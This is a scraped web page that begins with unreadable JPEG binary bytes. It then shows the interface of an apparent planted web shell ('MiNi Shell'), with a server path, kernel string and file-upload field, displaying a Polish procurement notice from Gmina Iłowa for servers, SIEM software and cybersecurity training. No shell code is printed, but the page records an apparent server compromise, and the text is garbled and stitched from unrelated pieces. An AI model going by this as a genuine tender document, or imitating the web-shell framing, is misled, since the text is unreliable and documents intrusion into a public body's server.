JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060429601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania <br/>oraz infrastruktury sprzętowej dla Gminy Iłowa <br/>realizowanego w ramach „Cyberbezpieczny Samorząd” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Iłowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770853</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iłowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">683681400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">683681401</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ilowa@ilowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ilowa.info.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania <br/>oraz infrastruktury sprzętowej dla Gminy Iłowa <br/>realizowanego w ramach „Cyberbezpieczny Samorząd” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b216f127-6fea-48a9-9ec9-780eda944081</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00604296</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00007611/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej dla Gminy Iłowa realizowanego w ramach „Cyberbezpieczny Samorząd”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie na Rozwój Cyfrowy </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b216f127-6fea-48a9-9ec9-780eda944081 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-b216f127-6fea-48a9-9ec9-780eda944081</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami będzie odbywała się przy użyciu Platformy e-Zamówienia,<br/>zwanej dalej „Platformą” która jest dostępna pod adresem: https://ezamowienia.gov.pl/pl/, oraz poczty elektronicznej, z<br/>zastrzeżeniem, że oferta musi być złożona przy użyciu Platformy.<br/>2) Wykonawca, który zamierza wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>„Wykonawca” na Platformie. Szczegółowe informacje dotyczące zakładania kont podmiotów oraz zasady korzystania z Platformy<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej http://ezamowienia.gov.pl/ oraz informacje<br/>zamieszczone w zakładce „Centrum Pomocy”.<br/>3) Komunikacja w postępowaniu z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie Platformy<br/>(http://ezamowienia.gov.pl/pl/regulamin#regulamin-serwisu).<br/>5) Maksymalny rozmiar przesyłanych plików wynosi 250 MB.<br/>6) Datą przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji jest data ich przekazania na ePUAP.<br/>7) Jeżeli Zamawiający lub Wykonawca przekazują sobie oświadczenia, wnioski zawiadomienia oraz informacje przy użyciu poczty<br/>elektronicznej, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.<br/>8) Zamawiający nie dopuszcza możliwości złożenia oferty wraz z wymaganymi dokumentami i zaświadczeniami przy użyciu poczty<br/>elektronicznej.<br/>9) We wszelkiej korespondencji związanej z niniejszym postepowaniem Zamawiający i Wykonawcy powinni posługiwać się<br/>następującym znakiem postępowania: ocds-148610-b216f127-6fea-48a9-9ec9-780eda944081<br/>10) Wykonawca składa ofertę za pośrednictwem zakładki „Oferty / wnioski” widocznej w podglądzie postępowania po zalogowaniu<br/>się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę / wniosek” system prezentuje okno składania oferty umożliwiające<br/>przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola „przeciągnij” i „upuść” służące do dodawania plików.<br/>Wykonawca dodaje uprzednio pobrany, wypełniony i podpisany „Formularz oferty” w pierwszym polu („Załączniki i inne dokumenty<br/>przedstawione w ofercie przez Wykonawcę”), Wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z ofertą.<br/>11) System sprawdza, czy złożone pliki są podpisane i automatycznie je szyfruje. W przypadku braku podpisu system poinformuje o<br/>tym w trakcie składania dokumentów, jednakże zostaną one przyjęte przez Platformę pomimo braku podpisu. Szczegółowe<br/>informacje, w jaki sposób podpisywać dokumenty podpisem kwalifikowanym znajdują się w instrukcji podpisywania znajdującej się w<br/>Centrum Pomocy na Platformie.<br/>12) W przypadku pozytywnego zakończenia procesu potwierdzenie czasu przekazania i odbioru oferty znajdować się będzie w<br/>Elektronicznym Potwierdzeniu Przyjęcia (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). Zarówno EPP i EPO dostępne są<br/>dla zalogowanego Wykonawcy w zakładce „Oferty / wnioski”<br/>13) Przed upływem terminu do składania ofert Wykonawca może wycofać ofertę za pośrednictwem zakładki „Ofert / wnioski”<br/>używając przycisku „Wycofaj ofertę”.<br/>14) W zależności od formatu podpisu kwalifikowanego i jego typu Wykonawca dołącza do Platformy uprzednio podpisane dokumenty<br/>wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>15) Dokument w formacie „pdf” należy podpisać używając formatu podpisu PAdES. Zamawiający dopuszcza podpisanie<br/>dokumentów w formacie innym niż „pdf”, wtedy należy użyć formatu XAdES.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna zgodnie z art. 13 RODO -<br/>Administratorem danych osobowych jest Burmistrz Iłowej ul. Żeromskiego 27, 68-120 Iłowa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP-I.271.20.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa wraz z wdrożeniem i uruchomieniem oprogramowania oraz infrastruktury sprzętowej<br/>dla Gminy Iłowa realizowanego<br/>w ramach „Cyberbezpieczny Samorząd”, dofinansowanego w formie grantu z programu Fundusze Europejskie na Rozwój<br/>Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2. Wzmocnienie krajowego systemu<br/>cyberbezpieczeństwa.<br/>Przedmiot zamówienia obejmuje:<br/>Obszar techniczny<br/>1) Serwer dla UG<br/>2) Serwer logów dla UG<br/>3) Serwer dla JP<br/>4) Macierz dyskowa dla UG<br/>5) Oprogramowanie SIEM Security Information and Event Management<br/>6) Oprogramowanie do zarządzania i aktualizacji systemów operacyjnych i oprogramowania na stacjach roboczych,<br/>serwerach, urządzeniach sieciowych dla UG<br/>7) Oprogramowanie do zarządzania i aktualizacji systemów operacyjnych i oprogramowania na stacjach roboczych,<br/>serwerach, urządzeniach sieciowych dla JP<br/>Obszar organizacyjny<br/>1) Szkolenia dla działu IT szkolenie z dostarczonej infrastruktury<br/>i cyberbezpieczeństwa<br/>2) Szkolenia dla pracowników spoza działu IT: testy socjotechnoczne i szkolenie<br/>z cyberbezpieczeństwa<br/>Szczegółowy Opis przedmiotu zamówienia przedstawiony został w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">48800000-6 - Systemy i serwery informacyjne</p> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72268000-1 - Usługi dostawy oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający<br/>stosować będzie następujące kryteria oceny ofert: cena i termin realizacji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki ubiegania się o udzielenie zamówienia<br/>1.1. o udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają następujące warunki dotyczące:<br/>1.1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>1.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>1.1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku udziału w postępowaniu.<br/>1.1.4. zdolności technicznej lub zawodowej:<br/>1.1.4.1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/>1) co najmniej 1 zamówienie na dostawę rozwiązań z zakresu cyberbezpieczeństwa przy czym w skład rozwiązań wchodził<br/>minimum serwer, macierz dyskowa oraz oprogramowanie do zarządzania i aktualizacji systemów operacyjnych<br/>i oprogramowania na stacjach roboczych, serwerach,<br/>2) co najmniej 2 zamówienia o wartości minimum 150 000,00 zł brutto każde, na dostawę sprzętu komputerowego<br/>rozumianego jako serwer lub/i macierz;<br/>3) co najmniej 2 zamówienia na dostawę oprogramowania SIEM Security Information and Event Managment.<br/>1.1.4.2. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że skieruje do realizacji zamówienia co<br/>najmniej jedną osobę pełniącą funkcję Inżyniera ds. wdrażania urządzeń serwerowych, posiadającą:<br/>a) co najmniej 3-letnie doświadczenie w zakresie wdrożeń urządzeń serwerowych − doświadczenie w zakresie udziału w<br/>minimum dwóch projektach informatycznych;<br/>b) ważny certyfikat wydany przez producenta serwerów oferowanych w ramach postępowania potwierdzający kompetencje<br/>z zakresu wdrażania i konfigurowania sprzętu serwerowego;<br/>c) wykształcenie wyższe informatyczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>1. potwierdzających spełnianie warunków udziału w postępowaniu, tj. :<br/>1.1. wykazu dostaw wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz<br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem<br/>dowodów określających, czy te dostawy zostały wykonane należycie (w celu potwierdzenia spełniania warunku określonego w pkt<br/>4.1.1.4.1. SWZ), sporządzonego zgodnie z załącznikiem nr 10 do SWZ.<br/>Dowodami potwierdzającymi czy dostawy zostały wykonane należycie są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - oświadczenie Wykonawcy.<br/>1.2. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (w celu potwierdzenia<br/>spełniania warunku określonego w pkt 4.1.1.4.2. SWZ), sporządzonego zgodnie z załącznikiem nr 11 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. oświadczenie Wykonawcy<br/>o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 ustawy<br/>Pzp, art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu<br/>zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy Pzp, sporządzonego zgodnie z Załącznikiem nr 9 do SWZ;<br/>2. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym<br/>Wykonawcą, który złożył odrębną ofertę albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej, sporządzonego zgodnie z Załącznikiem nr 7 do SWZ;<br/>3. odpisu lub informacji z Krajowego Rejestru Sądowego lub<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia, że oferowane dostawy spełniają wymagania minimalne określone przez Zamawiającego w Opisie<br/>przedmiotu zamówienia, Zamawiający żąda złożenia wraz<br/>z ofertą następujących przedmiotowych środków dowodowych:<br/>dla obszaru technicznego:<br/>1. Serwer dla UG<br/>a) Wydruk z testu dostępnego na stronie www.spec.org potwierdzający, że zainstalowany procesor w oferowanym serwerze<br/>osiąga wynik minimum 50.8 w teście SPECrate2017_int_base w konfiguracji jednoprocesorowej. Zamawiający dopuszcza<br/>wydruk w języku angielskim;<br/>b) Oświadczenie producenta potwierdzające, że serwis oferowanego serwera będzie realizowany bezpośrednio przez<br/>Producenta i/lub we współpracy<br/>z Autoryzowanym Partnerem Serwisowym Producenta;<br/>c) Oświadczenie producenta sprzętu dla oferowanego serwera potwierdzające, że oferowany serwer posiada gwarancję w<br/>ramach której, w przypadku wystąpienia awarii dysku twardego w oferowanym serwerze, uszkodzony dysk twardy pozostaje<br/>u Zamawiającego;<br/>d) Dokumenty potwierdzające, że firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub<br/>równoważną) na świadczenie usług serwisowych oraz, że firma serwisująca posiada autoryzacje producenta oferowanego<br/>serwera.<br/>2. Serwer logów dla UG<br/>a) Wydruk z testu dostępnego na stronie www.spec.org potwierdzający, że zainstalowany procesor w oferowanym serwerze<br/>osiąga wynik minimum 337 w teście SPECrate2017_int_base w konfiguracji dwuprocesorowej. Zamawiający dopuszcza<br/>wydruk w języku angielskim;<br/>b) Oświadczenie producenta potwierdzające, że serwis oferowanego serwera będzie realizowany bezpośrednio przez<br/>Producenta i/lub we współpracy<br/>z Autoryzowanym Partnerem Serwisowym Producenta;<br/>c) Oświadczenie producenta sprzętu dla oferowanego serwera potwierdzające, że oferowany serwer posiada gwarancję w<br/>ramach której, w przypadku wystąpienia awarii dysku twardego w oferowanym serwerze, uszkodzony dysk twardy pozostaje u Zamawiającego;<br/>d) Dokumenty potwierdzające, że firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub<br/>równoważną) na świadczenie usług serwisowych oraz, że firma serwisująca posiada autoryzacje producenta oferowanego<br/>serwera.<br/>3. Serwer dla JP<br/>a) Wydruk z testu dostępnego na stronie www.spec.org potwierdzający, że zainstalowany procesor w oferowanym serwerze<br/>osiąga wynik minimum 90.9 w teście SPECrate2017_int_base.<br/>Zamawiający dopuszcza wydruk w języku angielskim;<br/>b) Oświadczenie producenta potwierdzające, że serwis oferowanego serwera będzie realizowany bezpośrednio 